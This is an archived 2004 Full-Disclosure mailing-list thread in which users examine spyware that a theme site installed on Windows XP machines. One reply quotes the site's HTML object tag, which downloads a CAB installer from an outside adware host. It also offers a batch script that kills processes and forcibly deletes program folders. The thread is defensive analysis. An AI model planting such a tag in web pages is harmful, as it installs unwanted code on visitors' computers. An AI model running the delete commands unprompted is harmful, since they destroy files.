RE: [Full-Disclosure] Spyware installs ... XP SP2 box

From: Geraldo Rivera (iamafraud_at_hotmail.com)
Date: 10/06/04

  • Next message: GuidoZ: "Re: [Full-Disclosure] Paranid ramblings - what's the deal? Bounded variables aren't?" 
    To: ACastigliola@unumprovident.com, raize@gravito.com, full-disclosure@lists.netsys.com
Date: Tue, 05 Oct 2004 19:30:05 -0400

    Thanks to everybody for all the info posted here. I wish I had a machine
    available right now to set up a vanilla SP2 install so I could witness the
    results of visiting the site again myself.

    I did indeed say that I have visited the site in the past. However, I hadn't
    in a number of months prior to this visit. I also did not discover any
    adware/spyware that was installed on my machine prior to 10/2 (nor did
    ad-aware, spybot, or pest-patrol). I trust in the info that has been posted
    here, I just wish that I could witness it myself. I am very cautious when
    surfing (I know somebody is going to tell me not cautious enough since I am
    still using IE) so I am wondering what could have been installed prior to
    this visit that allowed this install to happen without any interaction.

    Regardless, thanks again to everybody for the good info, and a big *** you
    to themexp.org.

    >From: "Castigliola, Angelo" <ACastigliola@unumprovident.com>
    >To: "raize" <raize@gravito.com>, <full-disclosure@lists.netsys.com>
    >Subject: RE: [Full-Disclosure] Spyware installs ... XP SP2 box
    >Date: Tue, 5 Oct 2004 12:11:24 -0400
    >
    >Thank you for the test Raize. I appreciate your time.
    >
    > >One must assume that you are installing these "theme packs" via some
    >BHO (Browser Helper Object) that you
    > >installed previously or put the site on the "Always trust content from
    >this provider". Perhaps someone
    > >else can explain where I am missing the exploit, because a quick glance
    >over seems to indicate there is
    > >none for XP SP2. (I did not test this on SP1)
    >
    >I think you are right. It seems the only person that was not prompted
    >for the install that was not running SP2 was the original author of this
    >thread who said that it was a previously visited site.
    >
    >As far as users running SP1 there is no security warning that says an
    >executable is about to be installed. There is no Microsoft Update that
    >will prevent this from loading. Like most large organizations just
    >jumping to SP2 is not an option. It needs go though rigorous testing to
    >make sure it complies with all of our internal software.
    >
    >Angelo Castigliola III
    >Operations Technical Analyst I
    >UnumProvident IT Services
    >207.575.3820
    >-----Original Message-----
    >From: full-disclosure-admin@lists.netsys.com
    >[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of raize
    >Sent: Tuesday, October 05, 2004 9:29 AM
    >To: full-disclosure@lists.netsys.com
    >Subject: Re: [Full-Disclosure] Spyware installs ... XP SP2 box
    >
    >
    >The installed code is definitely:
    >
    ><object id="DDownload_UL1"
    >classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
    >codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
    >HEIGHT=0 WIDTH=0></object>
    >
    >However, there is no exploit here. I loaded this with a default honeypot
    >image of XPSP2 with IE as an Admin and nothing else installed other than
    >the drop down that asked me if I really wanted to trust this site for
    >installing an executable.
    >
    >One must assume that you are installing these "theme packs" via some BHO
    >(Browser Helper Object) that you installed previously or put the site on
    >the "Always trust content from this provider". Perhaps someone else can
    >explain where I am missing the exploit, because a quick glance over
    >seems to indicate there is none for XP SP2. (I did not test this on SP1)
    >
    >Spybot and Ad-aware do not catch and kill WinRebates and WinAd
    >spy/adware properly, but I have a batch command that will do it for you.
    >Included is a .zip of each IP contacted along with full URL request and
    >output. It also contains the contents of this email and the batch file
    >with these commands: (You'll want to rename the .txt to .bat)
    >
    >--------------------------------------------
    >cd "C:\Program Files\Winad Client"
    >taskkill /T /F /IM WinClt.exe
    >taskkill /T /F /IM WinAd.exe
    >erase WinClt.exe
    >erase WinAd.exe
    >cd ..
    >cd Web_Rebates
    >taskkill /T /F /IM WebRebates0.exe
    >taskkill /T /F /IM WebRebates1.exe
    >erase WebRebates0.exe
    >erase WebRebates1.exe
    >cd ..
    >rd /Q /S "Winad Client"
    >rd /Q /S "Web_Rebates"
    >cd "C:\Windows\system32"
    >taskkill /T /F /IM fjdria.exe
    >taskkill /T /F /IM ezSP_Px.exe
    >erase fjdria.exe
    >erase ezSP_Px.exe
    >
    >_______________________________________________
    >Full-Disclosure - We believe in it.
    >Charter: http://lists.netsys.com/full-disclosure-charter.html

    _________________________________________________________________
    Express yourself instantly with MSN Messenger! Download today - it's FREE!
    hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: GuidoZ: "Re: [Full-Disclosure] Paranid ramblings - what's the deal? Bounded variables aren't?"